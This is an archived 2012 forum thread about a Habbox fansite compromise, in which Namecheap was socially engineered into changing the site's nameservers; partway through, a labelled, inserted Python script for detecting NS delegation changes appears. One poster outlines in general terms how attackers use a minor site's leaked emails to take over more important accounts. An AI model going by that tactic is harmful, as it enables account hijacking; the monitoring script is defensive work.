I do applaud you for recognising my fondness for quotes "because I don't think some people understand what words mean" but when it boils down to things this was about as unserious as a breach can get and doesn't warrant this reaction. My argument is not fundamentally flawed as I have stated that this would be serious had this not been Habbox. PSN? Sure. PayPal? Of course. Habbo itself? Yep. This fansite? No, no one is making massive amounts of money using their scratched up microscopes to argue over the details of what happened. I almost feel like I should pay some people for the laughable things they say.

You've contradicted yourself, you show a blatant disregard for other people's personal information and you've attempted to belittle the entire Admin team here. I won't stoop to your level and continue this argument, if you wish to, you may PM me any time of day where me and the rest of the admin team will love to answer any questions you have and take any constructive criticisms you have to offer.

I'll leave you with one image, highly appropriate to this bank holiday.


http://1.bp.blogspot.com/-sRXyOP3xnDk/TtCnFZdweNI/AAAAAAAACnw/DZjZYjyPUbI/s1600/queen-come-at-me-bro.jpg

jasey
05-06-2012, 12:35 AM
You did not have to post in this thread at all, the discussion was actually going on fine to be honest.
I don't see why I am forbidden to. I didn't have to and I probably wouldn't have if I was still outside chopping down trees but it started to rain on the acreage and I came inside. Consider it a free lesson in life that you can think about.


I thought you would make that comparison yet you've seen it the wrong way. Habbox is a minor site, which is "easy pickings". Find the e-mail, the username and any information that can lead to a take over of more important accounts such as PSN accounts and there you have it, you've done little to no leg work. Would you rather attack the FBI straight on, or find a minor character and enter easily? Same thing, and all too common in this day and age.

EDIT: An obvious example can also be what happens on Habbo far too often. Find the e-mail associated with it > take over the account or just use the e-mail to find out their Facebook and so forth. Habbo have been known to change e-mail addresses on Habbo accounts if you e-mail them and make a persuasive argument.
Yes, and I have commented on how little I am worried about those stupid enough to leave themselves that vulnerable. Barring that, you can see my reply just above this one as a sort of closing statement. I'm all for six against one fights when none of the group is willing to do anything but defend their own shadow and I am certainly giddy to go see the -REP comments that I possess no doubt have been left for me in dishing out my opinion here. However, I would like to go eat so I will let everyone continue talking about the tragic incident. If I haven't ruined the thread for everyone by disagreeing, that is.


Mmhmm, you seem to care a lot right now? We never acted like it was more terrible than it was, in fact, I spent most of last night in the help desk advising people that it wasn't anything serious and reset passwords as a precaution if they ran the java app. The java app is in fact malicious so we're setting about advising users what to do if they're infected. Information is key in this which is why information was released. I honestly don't see the problem.

Also, don't worry, we had an awfully fun geek off in a skype chat while Recursion decompiled it for us. It was great.
Good, you see, that is something I am proud of. If this interests you, then have a geek off on Skype and use this as an opportunity to analyse this little 'hack' for your amusement. If you hold important dayjobs you will know this act is low, very low, as far as how serious online compromisation can get. Seriously, though. I have nothing against having interests. What bothered me here was the sensationalism over something so paltry in the grand scheme of things. I guess there is little excitement left around here for staff.


First of all-- there's nothing wrong with wanting to work in the computer science industry and there's nothing wrong with saying or expressing you want to work in the computer science industry. Second, instead of insulting my friend Tom in a novel like fashion by doing things like calling him a teen volunteer with a stupid dream you should be saying that to me. I (hi!) developed how content is stored on Habbox.com. Passwords stored in the Habbox.com as well as forum database are hashed, salted then hashed again. So unless you're uploading nude photos of yourself in the staff uploading section of the website I should hope you have nothing to fear of a database leak.

I don't know how many times I, Matt, Tom, Chip or anyone else can tell you this before you comprehend it: Habbox cares about its uptime and protecting users from harm's way where possible. Until you develop an argument focused around why Habbox should be a heartless zombie who doesn't care if we're affiliated with hackers, then your macho "I'm smarter than everyone who cares what happens to Habbox" attitude is completely redundant.
I don't think I'm smarter than everyone else. Making a logical fallacy like that is silly, you silly billy! There are people in this thread who can do things with code I am not capable of and I don't discredit them for a second. It is clear to me I have a more solid grip on reality, however, and perhaps that is what is off-putting to you about my attitude. I have never said that Habbox shouldn't look in to this — not once. What I have been saying is that Habbox should not have treated this issue with the banshee attitude that it did. It's ridiculous.

Now comes something that requires a little more thinking for me than understanding the blindness in some people: which flavour of latte do I reckon I should have right now?

Cheers!

xxMATTGxx
05-06-2012, 12:38 AM
What I have been saying is that Habbox should not have treated this issue with the banshee attitude that it did. It's ridiculous.


Are you saying we shouldn't have overreacted? Please I do really want to know what you have to say in regards of my question.

Calvin
05-06-2012, 12:40 AM
snip

Each and every website has one main priority whether they have thousands or 5 active users and that is to keep the website secure from attacks along with protecting their visitors. Just because Habbox is a little fansite for an online game doesn't mean that they shouldn't have to do that.

Perhaps you just need to have another dance off and chill:

*REMOVED*

Edited by Martin (Forum Super Moderator): Please do not post inappropriate content.

jasey
05-06-2012, 12:45 AM
Each and every website has one main priority whether they have thousands or 5 active users and that is to keep the website secure from attacks along with protecting their visitors. Just because Habbox is a little fansite for an online game doesn't mean that they shouldn't have to do that.

Perhaps you just need to have another dance off and chill:
*REMOVED*

Ah, my Bollywood days. Do you realise how big of a hit this was in India? Err, one thing though — I do make mention of where the American president is rubbing me in the end of that video and not putting that video in a spoiler might make the moderation team anxious. Perhaps one of the dozen staff observing this thread can fix that up if you have lost the 'edit' timeframe.

Edited by Martin (Forum Super Moderator): Please stay on topic.

HotelUser
05-06-2012, 12:45 AM
I'm going to try to branch out of replying to the cascading rebuttals to my original statement because apparently some people are plagued with delusions of grandeur.



"plagued with delusions of grandeur"? I think you're plagued with delusions of grandeur for simply using the phrase plagued with delusions of grandeur on what you said is a "website for teenagers". If Tom wants to sound like a technician then you want to sound like Mr. Tolkien himself.




-tldr tldr tldr-

My thoughts, specifically ones of pity, sit beside those who lose access to their online finances or something serious like that because their info was leaked from the Habbox database.



In your infinite wisdom, whilst you were calling my replies cascading rebuttals, and whilst you were saying I was being grandeur, you must have actually forgotten to read my posts because I think I already pointed out that the Habbox database being leaked would NOT be catastrophic (and that's odd, because how could you call me names based on the content of my replies unless you were actually reading them).




I don't know if you are unaware that I have been around this site more or less since its launch and I no longer play Habbo actively. I understand that there is a community that sticks around here but it is a bit telling when the majority of posts on this forum come from the same few dozen people over and over, day by day. How many new users who become very active has Habbox gotten in the last three months?



Same here, I'm user number 420 and have been here longer than you (okay so nooow I'm being grandeur), and I understand that there is a community that sticks around here who is annoyed when the website goes down, and who would be hurt if they did lose their Habbo account because unlike you I do understand that not everyone is a 24 year old taking an English degree, and that younger members would be upset by losing accounts. There is nothing wrong with that at all, I cannot fathom why you are insensitive to these ideas.




I do applaud you for recognising my fondness for quotes "because I don't think some people understand what words mean" but when it boils down to things this was about as unserious as a breach can get and doesn't warrant this reaction. My argument is not fundamentally flawed as I have stated that this would be serious had this not been Habbox. PSN? Sure. PayPal? Of course. Habbo itself? Yep. This fansite? No, no one is making massive amounts of money using their scratched up microscopes to argue over the details of what happened. I almost feel like I should pay some people for the laughable things they say.

Your argument is fundamentally flawed because when it boils down to things Habbox cares about its uptime and protecting users from harm's way where possible.



I don't think I'm smarter than everyone else. Making a logical fallacy like that is silly, you silly billy! There are people in this thread who can do things with code I am not capable of and I don't discredit them for a second. It is clear to me I have a more solid grip on reality, however, and perhaps that is what is off-putting to you about my attitude. I have never said that Habbox shouldn't look in to this — not once. What I have been saying is that Habbox should not have treated this issue with the banshee attitude that it did. It's ridiculous.

Now comes something that requires a little more thinking for me than understanding the blindness in some people: which flavour of latte do I reckon I should have right now?

Cheers!

Ah, so you don't think you're smarter than everyone else but you do think you're more rational than everyone else because you behaved differently than other people did when a website had what you're calling a "minor" interference. Yep-- that sounds like perfectly sound justification to make the broad statement that you're more rational than everyone else. Wrong. Just because other people react in situations differently than you react doesn't make you superior, and it doesn't make them wrong. It just makes you and them different from each other. No harm is coming from discussing what happened at the end of the day.

Kasabian
05-06-2012, 12:52 AM
brb moving to france

back lol ¬¬¬¬¬¬

Edited by Martin (Forum Super Moderator): Please stay on topic

Tomm
05-06-2012, 12:55 AM
http://i.qkme.me/3omnqu.jpg

Although, would still be nice to know how/why Namecheap changed the nameservers.
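The nameserver change discussed in this thread was made at the registrar, so nothing on the site's own servers would have recorded it; the domain owner can only notice it by watching the delegation from outside. As an added example (not part of the thread, and not Habbox's or Namecheap's code), this compares observed NS sets against a pinned baseline and measures how long a deviation lasted. All hostnames, source labels, timestamps and function names are constructed for illustration.

```python
"""Flag nameserver (NS) delegation changes against a pinned baseline.

Every hostname and observation below is constructed sample data.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


def normalize(host):
    """Canonical form for comparison: trimmed, lowercase, no trailing dot."""
    return host.strip().rstrip(".").lower()


@dataclass(frozen=True)
class Observation:
    seen_at: datetime
    source: str              # where the NS set was read (labels are assumptions)
    nameservers: frozenset   # empty set means the lookup failed


@dataclass(frozen=True)
class Finding:
    seen_at: datetime
    source: str
    severity: str            # "replaced", "partial" or "reduced"
    added: tuple
    missing: tuple


def observe(seen_at, source, hosts):
    return Observation(seen_at, source, frozenset(normalize(h) for h in hosts))


def check(baseline, observations):
    """Return one Finding per observation whose NS set differs from baseline."""
    expected = frozenset(normalize(h) for h in baseline)
    findings = []
    for obs in sorted(observations, key=lambda o: o.seen_at):
        if not obs.nameservers:
            continue  # a failed lookup is missing data, not proof of a change
        added = obs.nameservers - expected
        missing = expected - obs.nameservers
        if not added and not missing:
            continue
        if not (obs.nameservers & expected):
            severity = "replaced"   # whole delegation moved elsewhere
        elif added:
            severity = "partial"    # unknown server mixed into the set
        else:
            severity = "reduced"    # an expected server disappeared
        findings.append(Finding(obs.seen_at, obs.source, severity,
                                tuple(sorted(added)), tuple(sorted(missing))))
    return findings


def exposure_window(baseline, observations):
    """Time from the first deviation to the first clean reading from the same
    source. None if nothing deviated or the deviation has not been reverted.
    Other sources are ignored because caching resolvers can keep returning
    the old, correct set after the delegation has already changed."""
    expected = frozenset(normalize(h) for h in baseline)
    ordered = sorted(observations, key=lambda o: o.seen_at)
    findings = check(baseline, ordered)
    if not findings:
        return None
    first = findings[0]
    for obs in ordered:
        if (obs.source == first.source and obs.seen_at > first.seen_at
                and obs.nameservers == expected):
            return obs.seen_at - first.seen_at
    return None


# Constructed baseline and readings (not taken from the incident).
BASELINE = ["ns1.dns-provider.example", "ns2.dns-provider.example"]
SAMPLE = [
    observe(datetime(2024, 1, 1, 20, 0), "parent-zone",
            ["NS1.dns-provider.example.", "ns2.dns-provider.example."]),
    observe(datetime(2024, 1, 1, 21, 0), "parent-zone",
            ["ns1.unknown-host.example", "ns2.unknown-host.example"]),
    observe(datetime(2024, 1, 1, 21, 0), "resolver-a",   # still cached
            ["ns1.dns-provider.example", "ns2.dns-provider.example"]),
    observe(datetime(2024, 1, 2, 9, 0), "parent-zone", []),  # lookup failed
    observe(datetime(2024, 1, 2, 22, 30), "parent-zone",
            ["ns1.dns-provider.example", "ns2.dns-provider.example"]),
]

if __name__ == "__main__":
    for f in check(BASELINE, SAMPLE):
        print(f.seen_at, f.source, f.severity, "added:", f.added)
    print("exposure:", exposure_window(BASELINE, SAMPLE))
```

In practice the observations would come from periodic NS lookups against the parent zone and a few public resolvers, and a "replaced" finding would page someone who can reach the registrar account.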

HotelUser
05-06-2012, 01:00 AM
http://i.qkme.me/3omnqu.jpg

Although, would still be nice to know how/why Namecheap changed the nameservers.

I'm curious about that as well. When Tom told me what happened this morning I lodged off a support ticket with them, and this evening they replied saying they're looking into it and will communicate with the owner of the domain. I mentioned that it would look good on them to enter the thread and explain what happened, perhaps offer an apology, but unfortunately they've not done so yet. Ah, well-- I'm not going to renew my domains with NameCheap any more I don't think.

Chippiewill
05-06-2012, 01:03 AM
From what I've heard there is no reason yet and Sierk/Jin are the only ones who will find out if there is one other than NameCheap being idiots however I personally doubt namecheap would admit to it happening unless there's a way to prove it.

Juliet-NC
05-06-2012, 07:00 PM
Hello,

I am Juliet Morris, Director of Operations at Namecheap. We would like to thank Habbox for working closely with us to help resolve this issue as quickly as possible.

Also, I wanted to take a moment to address the concerns that were brought up in this thread. Please know that the security of all of our clients is a major priority and something we take very seriously. This situation was a result of many different factors, including advanced social engineering, human error, and well forged documentation.

As such, we have fully reviewed this situation and taken the steps to ensure this does not happen again, in the future. We are adding extra levels of verification to our policies and the representative involved has been let go. Your security is our first concern.

Thank you, again

Juliet Morris
Director of Operations
Namecheap, Inc.

GoldenMerc
05-06-2012, 07:10 PM
Hello,

I am Juliet Morris, Director of Operations at Namecheap. We would like to thank Habbox for working closely with us to help resolve this issue as quickly as possible.

Also, I wanted to take a moment to address the concerns that were brought up in this thread. Please know that the security of all of our clients is a major priority and something we take very seriously. This situation was a result of many different factors, including advanced social engineering, human error, and well forged documentation.

As such, we have fully reviewed this situation and taken the steps to ensure this does not happen again, in the future. We are adding extra levels of verification to our policies and the representative involved has been let go. Your security is our first concern.

Thank you, again

Juliet Morris
Director of Operations
Namecheap, Inc.

Can you prove you're NameCheap staff? Or can any staff verify she is?

Nevertheless, after this mistake your security sort of makes me feel uneasy, thus why I will be moving from NameCheap to GoDaddy in the next couple of days.
Ross

Recursion
05-06-2012, 07:12 PM
Hello,

I am Juliet Morris, Director of Operations at Namecheap. We would like to thank Habbox for working closely with us to help resolve this issue as quickly as possible.

Also, I wanted to take a moment to address the concerns that were brought up in this thread. Please know that the security of all of our clients is a major priority and something we take very seriously. This situation was a result of many different factors, including advanced social engineering, human error, and well forged documentation.

As such, we have fully reviewed this situation and taken the steps to ensure this does not happen again, in the future. We are adding extra levels of verification to our policies and the representative involved has been let go. Your security is our first concern.

Thank you, again

Juliet Morris
Director of Operations
Namecheap, Inc.

Any chance you could explain this a bit further? Particularly the documentation part, I understand how easy it can be to fall for the first two... but I'm interested in how "documentation" was created that could look real enough to convince yourselves that we wanted the nameservers changed without proper authorization.

Like many others here, I have domains held with Namecheap and this whole situation has made me uneasy about keeping them with you.

Juliet-NC
05-06-2012, 07:52 PM
Can you prove you're NameCheap staff? Or can any staff verify she is?

Nevertheless, after this mistake your security sort of makes me feel uneasy, thus why I will be moving from NameCheap to GoDaddy in the next couple of days.
Ross

Ross, I am new to the Namecheap family but I am staff. I am not sure how exactly to prove that here. :) I actually signed up here specifically to address this situation. Meanwhile, we are sorry to see you go but we understand, as well, and hope that we can, in some way, help elevate your concerns in the future and win you back.



Any chance you could explain this a bit further? Particularly the documentation part, I understand how easy it can be to fall for the first two... but I'm interested in how "documentation" was created that could look real enough to convince yourselves that we wanted the nameservers changed without proper authorization.

Like many others here, I have domains held with Namecheap and this whole situation has made me uneasy about keeping them with you.


For security reasons, I am not able to provide the exact details on what we look for, checks in place, etc. I can say we were provided with photo identification as part of the documentation. Knowing that this can be duplicated easier with today’s technology, we do have other checks in place. However, this is where the human error occurred and thus has been promptly dealt with, accordingly.

I do not wish to "hijack" this thread, but would like to say that if you have any questions or concerns about your own account or domains, please don’t hesitate to contact our support staff. They will help you both with your account and security in general.

Thanks,

Juliet

GoldenMerc
05-06-2012, 07:54 PM
Ross, I am new to the Namecheap family but I am staff. I am not sure how exactly to prove that here. :) I actually signed up here specifically to address this situation. Meanwhile, we are sorry to see you go but we understand, as well, and hope that we can, in some way, help elevate your concerns in the future and win you back.





For security reasons, I am not able to provide the exact details on what we look for, checks in place, etc. I can say we were provided with photo identification as part of the documentation. Knowing that this can be duplicated easier with today’s technology, we do have other checks in place. However, this is where the human error occurred and thus has been promptly dealt with, accordingly.

I do not wish to "hijack" this thread, but would like to say that if you have any questions or concerns about your own account or domains, please don’t hesitate to contact our support staff. They will help you both with your account and security in general.

Thanks,

Juliet
Not going to lie, I found it a tad strange that this happened because about 2 years ago I tried to get on one of my old accounts on NameCheap called "SilverMerc" :P. Your staff told me the account didn't belong to me, yet I could easily prove all the details. Now I guess I know why you're called NameCheap

mrwoooooooo
07-06-2012, 10:47 PM
Can you prove you're NameCheap staff? Or can any staff verify she is?

Nevertheless, after this mistake your security sort of makes me feel uneasy, thus why I will be moving from NameCheap to GoDaddy in the next couple of days.
Ross
http://www.linkedin.com/in/julietmorris

GoldenMerc
08-06-2012, 11:09 AM
http://www.linkedin.com/in/julietmorris

Mate we realised this ages ago...
